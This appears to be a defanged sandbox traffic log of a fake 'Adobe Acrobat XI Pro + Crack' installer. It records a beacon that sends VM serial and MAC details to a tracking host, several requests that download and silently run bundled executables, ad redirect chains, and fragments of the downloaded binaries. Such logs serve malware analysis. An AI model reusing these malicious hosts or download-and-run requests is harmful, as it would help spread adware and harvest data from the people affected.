GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&transId=139867460&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.7188832209728342 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: ee.wintervenepest.bid


HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:30 GMT

Content-Length: 0

HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X
-Powered-By: PHP/5.3.28..Date: Sun, 27 Nov 2016 15:37:30 GMT..Content-
Length: 0..

GET /stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: off.ncongruousric.bid

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Content-Type: application/force-download

Content-Length: 67426

Connection: keep-alive

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.28

Content-Disposition: attachment; filename="583afdd9a9098.exe"

X-Powered-By: ASP.NET

Date: Sun, 27 Nov 2016 15:38:02 GMT

X-Cache: Miss from cloudfront

Via: 1.1 e4a44efc4b3241dc23019df63a1f645c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: mqZv_Hk7WsVo5gRdzQsl8YqdXLbfXdm6CwSxY3B06yeKlYsWx7oY_w==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...|...B...:............@..............
.........................@.................................p..........
......................`...............................................
........................................text....s.......t.............
..... ..`.rdata... .......,...x..............@..@.data.... ...........
...............@....ndata...................................rsrc......
.........................@..@.reloc..4...........................@..B.
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u...
..@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.....
..P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ

<<< skipped >>>

POST hXXp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: ee.wintervenepest.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 602

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695
HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:22 GMT

Connection: close

Content-Length: 76128
_..BL.[7.B.....~..>.k...F.)0.B.$}6..@$0N).Z.U}y.d..B...)5....k...f\
.~....8....EK.).8........X c..j. ....b....V......7ZX'o...b.~9.x .?...G
...X...c.?.....G.z.EZ.^M..OI..,..19.AL.y3..-......D.......W....Ku.Y.}.
2..N.6....-.J...Tq...G.-.9.c..5..F.s..;b].F..f.Pj....;ox.....wdB....j.
u..4] 5[y.i..L..\m..Y. .!.!lvgT..equ....>.%..|.M..........Z..b.q.|.
I9.3..m..O....."AFI........PI..fA..y..'&.S<:..5D.Rj.8;gN....#......
.u....O.u..zq...h..C..?I..........#..cL....E8...v.d:....S..}-.@.g....T
..C.KQg... .0....N.3....8...v..P;..d.F4.R.....M.x.(.]....e...T}F7].Ii.
.6.-..@.C..~;..:E7$<.................w...NT6.;..n.5..E\.R.....x....
..>Z.......!..(-3..o.K...b^].Y.za^'.b.....[..y......0..Y..shC..^$..
..U....N.....z.t.F.[....YN..i........>.EJ.!.a.R.e.........?.....i.I
....1=.7XJ...F).pV_.J.N.P%R.;...}...&...M.... .l.=).d....V.5W.P.mP...5
i...}.k.....i.....B...TJ.....D.P..}....Y!......._y.]..;..B..........a.
m..bt.{3W".a.e.y...P...........3..f.q....w\.....N..H...B.......@Nv.G..
....%E....Wv......1y.....v.XkF.A..{n#.....l.@f4..=...lP...yv. ...(..V.
.V.G..g;DKs.e..]..]....c......?...L...K.1v..B..b.v.....*o.F....c.L...S
rb.g~...\.._.........\....&.......?;.....*5..t.~g..>...3~su.....usK
.p...M.6.4..?....XYr)W..Ak.Nq......E...6..,....].. ...>.XW9 ...!...
.....0.2.....f...=%'c.@...2...f....k.f....Y...z..t.'\............Z{k..
n.:.A......r....[..k.E..,.;..~.........?H......3.{....'..$U/q..-.....;
9p_m~b...y..g...tV`x....k..b.!.../..j..m.....e..}.....!x..K.S>7.%.s
I&&>......7Fe.Nh.u.2...`.HJd..Ga:.Og. &...Y.j.xh.......hv..4...<<< skipped >>>

GET /normal_bg.jpg HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d2adi7hu49xk5t.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/jpeg

Content-Length: 26781

Connection: keep-alive

Date: Thu, 22 Sep 2016 18:01:12 GMT

Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT

ETag: "b5b0ebe137c0293f816eaac3de2b4e51"

Accept-Ranges: bytes

Server: AmazonS3

Age: 74433

X-Cache: Hit from cloudfront

Via: 1.1 14484a063800eaed878a3068abf4dfac.cloudfront.net (CloudFront)

X-Amz-Cf-Id: RczU8nabXC7YY05ZRPnbSYN4ruZ16XLLgkDlYC3eb6xeh2YUccPUaQ==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-
c011 66.146729, 2012/05/03-13:40:03        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="ht
tp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.
0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 W
indows" xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE" xm
pMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7
EE" stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"/> &
lt;/rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpack
et end="r"?>....Adobe.d............................................
......................................................................
.................................E....................................
................................................!.1AQa...q.....2R..u.7
...."...U..B.....5.b..%4Tte'r.E..#$D......................!1."AQ2.a..B
R.q...b.#3.....r......S......C.............?....j9...n..OK....xr...8..
q.C..o..k.k..L[3...v....z.zqNi(...T..#.mJ..TU.....SYi.U.-[NJ9..e.IU.;.
k.KY...Rm..{.....K...M..D.b...E.;.k.K[..#&.kG.....F..........k~p., ...
.J. .0...K-7.(..m..2q...1.}.V.1l...U........E.....*..5..fi.Oe.{...<<< skipped >>>

GET /9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: aclick.adhoc2.net

Connection: Keep-Alive


HTTP/1.1 302 Found

Date: Sun, 27 Nov 2016 15:38:41 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=da060fb656d4e2b9f0756b182bd523f481480261121; expires=Mon, 27-Nov-17 15:38:41 GMT; path=/; domain=.adhoc2.net; HttpOnly

Location: hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999

Server: cloudflare-nginx

CF-RAY: 3086ab26d67b4014-SOF
b3..<a href="hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=
A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJ
Xsdd1yj83z3FwfE3m0&var3=9999">Found</a>.....0..HTTP/1.1 3
02 Found..Date: Sun, 27 Nov 2016 15:38:41 GMT..Content-Type: text/html
; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..S
et-Cookie: __cfduid=da060fb656d4e2b9f0756b182bd523f481480261121; expir
es=Mon, 27-Nov-17 15:38:41 GMT; path=/; domain=.adhoc2.net; HttpOnly..
Location: hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A309721261
4-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0
&var3=9999..Server: cloudflare-nginx..CF-RAY: 3086ab26d67b4014-SOF..b3
..<a href="hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3
097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXs
dd1yj83z3FwfE3m0&var3=9999">Found</a>.....0..

GET /get.php?ses=482796663418412224 HTTP/1.0

Host: away.yosauruslega.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 753152

Connection: close

Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0

Pragma: no-cache

Expires: Sun, 01 Jan 2014 00:00:00 GMT

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Access-Control-Allow-Origin: *

Content-Transfer-Encoding: Binary

Content-disposition: attachment; filename="cpSetup.exe"

Date: Sun, 27 Nov 2016 15:37:18 GMT

X-Cache: Miss from cloudfront

Via: 1.1 23d92aa442d5ae9ed0313643d8764687.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Tb6ZJ-_nkdTtqyG7ZIBb1o9GqM223LHzFjNSNfbX87GUeAUw5AtP-Q==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........I..H(..H(..
H(....N.D(....L..(....M.U(..sv..^(..sv..s(..sv..j(....t.M(..H(..((...v
..Y(...v@.I(..H((.I(...v..I(..RichH(..........................PE..L...
..:X.................F...N......pF.......`....@.......................
................@.....................................P...............
................8;..P9..8....................9.......9..@............`
..<............................text....D.......F.................. 
..`.rdata.......`...0...J..............@....data... ............z.....
.........@....gfids...............z..............@..@.rsrc............
....~..............@..@.reloc...@.......B...<..............@.......
......................................................................
......................................................................
......................................................................
..................................................U..Qj .3/......E..E.
...J...]....U..j....J......]................U..j....J......]..........
.........J..fP..h0TF...3..Y...........h..G....J...O..h@TF...3..Y......
j......hPTF....0G....J..y3.........J....J.....J......hzTF..V3..Y.h.TF.
.J3..Y.h.TF..>3..Y.j.j.h..J....J..R...h.TF...3..Y.VWj......Y...J...
.......j.V......J.dnF..4...h.TF...2..Y_^....J.........J..w...h.TF...2.
.Y.h.TF...2..Y....J..U...h.TF...2..Y.............U........E..T..8G....
E..E...]...U...E.P......E.....$........]...U..Q.M..E....aF.3..U...

<<< skipped >>>

GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1

Cache-Control: max-age = 564348

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT

User-Agent: Microsoft-CryptoAPI/6.1

Host: g.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.10.1

Content-Type: application/ocsp-response

Content-Length: 1362

content-transfer-encoding: binary

Cache-Control: max-age=563498, public, no-transform, must-revalidate

Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT

Expires: Sun, 4 Dec 2016 04:06:13 GMT

Date: Sun, 27 Nov 2016 15:38:44 GMT

Connection: keep-alive
0..N......G0..C.. .....0.....40..00.......j.#.p.e$.\ps.*.. .j..2016112
7040613Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U
....... ...:.....20161127040613Z....20161204040613Z0...*.H............
.n%... l8.(,.Q`.j...:..6.xSGt*.....[.....(.S.V....gS.7.....R..}.Sl....
{..._..m.@..^.).>.....(..../.ze.F.f:..m.<@...Z.A.H.....&1Z .'...
...~.X..:.[:/...n..SO I.8M.#w.0.D..$P.....,.......G[....~q..C.....Kp.~
.`SQ.N....`.~&.sP.D.........9..t...:5...'....u.l.........0...0..|0..d.
.......:.0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U
....GeoTrust Global CA0...151203170230Z..161214170230Z02100...U...'Geo
Trust Global CA TGV OCSP Responder 40.."0...*.H.............0.........
[.c.#zj......RME.....,......(..U......!-.l..R..E.~..%."./8mv..D...*...
Rx........mw.~2..Q5T\.H...Wk*..a.z.$._..T......;T.S.r(._*.G....^.P.!.3
..t.......s......P....C._.g.b.oK...EV..>...>.|.o.~quo...........
..v4..Tt....Q.]A.Y......... w.E..=.%.n7.......{" *C........0..0...U.#.
.0....z.h.....d..}.}e...N0... .....0......0...U.%..0... .......0...U..
.........0...U.......0.0 ..U....0...0.1.0...U....TGV-C-670...*.H......
.........aEc<..'R......]C.ri.Zm.....|..B.$..76..h....l...Xbxua...C.
X.S....~K..A..._.T@$.....9(.... ......\.*.....5.b.x...[QM.._9P.=..l...
gf..L.?..3 ......Z....._...20R;...x.......C..0....l.G.A..5TS>d.U...
...w.(\....v..9.z7.....J..;..'...u.Y...BB.@.2u.e..eW..J.U....<<< skipped >>>

GET /launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic= HTTP/1.0

Host: get.enomenalco.club

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 871

Connection: close

Date: Sun, 27 Nov 2016 15:38:05 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 3df8c233328fbbb4fd91eb496d73f2d8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: e8d2sKG-Rk6x8CGWhvDe4g0XzMRR9SWs9pQwMPHTkmgpIXg8EyIF4Q==
files=4.t1=dl.u1=hXXp://get.ynoptisticglob.bid/?affId=1006&appTitle=Ad
obe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&s
etupName=cpSetup&appVersion=2.92&instId=11&exe=1.n1=cpSetup.exe.b1=cp.
c1=sevenzip-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://wet.sodcattilyrem.bid/stu
b_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat%2
0XI Pro 11.0.18 M.n2=sevensetup.exe.b2=rx.c2=sevenzip-1.s2=0.m2=
0.d2=0.t3=dl.u3=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.
5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/dow
nloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmd
line]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_i
nstaller.png.n3=Setup__2140_il2.exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d
3=0.fn1=Components.fn2=File opener.fn3=File finder.fn4=SevenZip.ftitle
=to run your file.itype=silent...

GET /taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

Host: gurusetman.info

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently

Date: Sun, 27 Nov 2016 15:38:27 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=dcffe8a79a413e2d5aac5285621a4dd561480261106; expires=Mon, 27-Nov-17 15:38:26 GMT; path=/; domain=.gurusetman.info; HttpOnly

X-Powered-By: PHP/5.4.37

Pragma: no-cache

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Cache-Control: post-check=0, pre-check=0

Last-Modified: Sun, 27 Nov 2016 15:38:26 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Location: hXXp://tobacted.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3

Access-Control-Allow-Credentials: true

Access-Control-Allow-Headers: *

Access-Control-Request-Headers: *

Server: cloudflare-nginx

CF-RAY: 3086aacc60c92950-OTP
0..HTTP/1.1 301 Moved Permanently..Date: Sun, 27 Nov 2016 15:38:27 GMT
..Content-Type: text/html..Transfer-Encoding: chunked..Connection: kee
p-alive..Set-Cookie: __cfduid=dcffe8a79a413e2d5aac5285621a4dd561480261
106; expires=Mon, 27-Nov-17 15:38:26 GMT; path=/; domain=.gurusetman.i
nfo; HttpOnly..X-Powered-By: PHP/5.4.37..Pragma: no-cache..Cache-Contr
ol: no-cache, no-store, must-revalidate, max-age=0..Cache-Control: pos
t-check=0, pre-check=0..Last-Modified: Sun, 27 Nov 2016 15:38:26 GMT..
Expires: Mon, 26 Jul 1997 05:00:00 GMT..Location: hXXp://tobacted.info
?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELv
PEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acr
obat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_i
d2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQl
sgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3..Access-Control-Allow-
Credentials: true..Access-Control-Allow-Headers: *..Access-Control-Req
uest-Headers: *..Server: cloudflare-nginx..CF-RAY: 3086aacc60c92950-OT
P..0..<<< skipped >>>

GET /css/twin.css HTTP/1.1

Accept: text/css

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Encoding: gzip

Content-Type: text/css

Date: Sun, 27 Nov 2016 15:38:42 GMT

ETag: W/"58372388-3b06f"

Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

transfer-encoding: chunked

Connection: keep-alive
5eef..............gs.J.(....v:&^......x... @....7xC8......M..D.......F
.X*......'....rB......6....o..'.?.../.~.. .7.....;.............$...ed7
u^V...%.Uy.K..^.R...../I.xY.......`8/...)..{^...~...?...?..(-..~i../.3
.x..mU..<.@#ET}w..v.....4J....H...U....W.A.c........cx`....'.q...{.
z.W^={$. #...<....r@......y....C......6"..dy....hl0./n.ZQ.....u....
..../nt..KUX.__..H.../..{......z.}.Q..._........__..#.....k.V..?......
..y......Z ....}q....]....*\.....(......l../g@..g...*...Z.n8....<..
Uc.....P{.@..B.........wh..u....o.o......`......'.=P.x........N.....X.
.....<.X.....:....U..3<bU..7........V..7^j{....f.'.....t.u.:...|
.U.e.3..&(o...-.......3.U5ij..J...........`<........\...........G..
.Ov^.&...5...z....A.}.....f%..W.....Q .f%Q.p.`E&Q.......?}.......c.~..
.~..p..H...8....0'....o.7H.@.x.6.....V.%._...=.....l...S..l.p...7v....
...:`......o@.=}|m.....oyl.....,}s.$...t..nh.~.,a.>.C..6......E....
...$.)...V.-.c..".."s.Pu.dea.``."..y..........K...qc...e8.......A..v!.
.o.....*.$......H.m...q.~..w.^..koK....M5,........./..G.Zn~.X.....l./.
__...#......`.G...C......x.g3..<..m]x....n&.......=.....}0..c......
..b....._n6.o/...2......o....(./.?c..z#.&...}.t.KA`....K...p.....a2...
.........5r...G.({.....g$#..-Y.7....,...9.`.&.....;x.#~d..........7t.B
.........:..z.. .../#.[;......k...e.. ..?.s.B...?>.:L?..?J.....my..
..{%......`.}.#`.U._....`z../.......?....0o2...m............]Y.9.E...=
l..K..R./..g..g....a..8o......D........F"......h.....W..G.o........V..
%..'i/.h~....`I........bX,_........@..)1~x3B~0C.,....F....S...<<<< skipped >>>

GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

Host: tobacted.info

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Date: Sun, 27 Nov 2016 15:38:27 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d6eda53e888ba9059880b27824ddbd7461480261107; expires=Mon, 27-Nov-17 15:38:27 GMT; path=/; domain=.tobacted.info; HttpOnly

X-Powered-By: PHP/5.4.16

Location: hXXp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye

Server: cloudflare-nginx

CF-RAY: 3086aad035062914-OTP

0..HTTP/1.1 302 Moved Temporarily..Date: Sun, 27 Nov 2016 15:38:27 GMT
..Content-Type: text/html..Transfer-Encoding: chunked..Connection: kee
p-alive..Set-Cookie: __cfduid=d6eda53e888ba9059880b27824ddbd7461480261
107; expires=Mon, 27-Nov-17 15:38:27 GMT; path=/; domain=.tobacted.inf
o; HttpOnly..X-Powered-By: PHP/5.4.16..Location: hXXp://elja.linggyp.r
u/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWU
op3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1t
mSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUme
pNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6I
SZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVL
WFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciw
iIxIiOiIXZ2Jye..Server: cloudflare-nginx..CF-RAY: 3086aad035062914-OTP
..0..

<<< skipped >>>

GET /launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: get.ercationiv.club

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 165

Connection: keep-alive

Date: Sun, 27 Nov 2016 15:38:03 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 1d32f672764a20290d04a16248d04c57.cloudfront.net (CloudFront)

X-Amz-Cf-Id: pwOrHWNvHEzqRYu6kTcPvSZ6KfYulsUHBz183NeW7ON1TJMeH6lwVw==
s=first..u=hXXp://off.ncongruousric.bid/stub_maker.php?program=sevenzi
p&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.
18 Multilingual + CrackHTTP/1.1 200 OK..Content-Type: text/html; cha
rset=UTF-8..Content-Length: 165..Connection: keep-alive..Date: Sun, 27
 Nov 2016 15:38:03 GMT..Server: Apache/2.2.15 (CentOS)..X-Powered-By: 
PHP/5.3.3..X-Cache: Miss from cloudfront..Via: 1.1 1d32f672764a20290d0
4a16248d04c57.cloudfront.net (CloudFront)..X-Amz-Cf-Id: pwOrHWNvHEzqRY
u6kTcPvSZ6KfYulsUHBz183NeW7ON1TJMeH6lwVw==..s=first..u=hXXp://off.ncon
gruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_
typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack.
.

GET /9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

Host: elja.linggyp.ru

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Sun, 27 Nov 2016 15:37:49 GMT

Content-Type: application/exe; charset=windows-1251

Content-Length: 3951944

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Sun, 27 Nov 2016 15:37:49 GMT

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="Adobe Acrobat XI Pro 11.0.exe"

Content-Transfer-Encoding: binary

Pragma: public

MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........@'...................@..........................p=.......<
..........@...........................P#.81... %.IN...........(<.H%
....#..m............................#.................................
....................CODE....(........................... ..`DATA....lL
